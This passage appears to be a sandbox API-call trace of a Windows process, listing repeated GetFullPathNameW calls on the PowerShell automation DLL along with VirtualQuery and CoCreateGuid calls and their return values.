	[0143.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.729] VirtualQuery (in: lpAddress=0x14baf0, lpBuffer=0x14c9b0, dwLength=0x30 | out: lpBuffer=0x14c9b0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.731] VirtualQuery (in: lpAddress=0x14baf0, lpBuffer=0x14c9b0, dwLength=0x30 | out: lpBuffer=0x14c9b0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.734] VirtualQuery (in: lpAddress=0x14baf0, lpBuffer=0x14c9b0, dwLength=0x30 | out: lpBuffer=0x14c9b0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.735] VirtualQuery (in: lpAddress=0x14baf0, lpBuffer=0x14c9b0, dwLength=0x30 | out: lpBuffer=0x14c9b0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.735] VirtualQuery (in: lpAddress=0x14b1e0, lpBuffer=0x14c0a0, dwLength=0x30 | out: lpBuffer=0x14c0a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.736] VirtualQuery (in: lpAddress=0x14b270, lpBuffer=0x14c130, dwLength=0x30 | out: lpBuffer=0x14c130*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.736] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.736] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.737] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.737] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.737] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.738] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.738] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.738] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.738] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.738] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.739] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.739] VirtualQuery (in: lpAddress=0x14b620, lpBuffer=0x14c4e0, dwLength=0x30 | out: lpBuffer=0x14c4e0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.739] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.740] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.740] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.740] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.741] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xbca28137, Data2=0x6325, Data3=0x47e6, Data4=([0]=0xa9, [1]=0x86, [2]=0x3c, [3]=0x51, [4]=0xae, [5]=0x74, [6]=0x96, [7]=0x5))) returned 0x0
	[0143.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
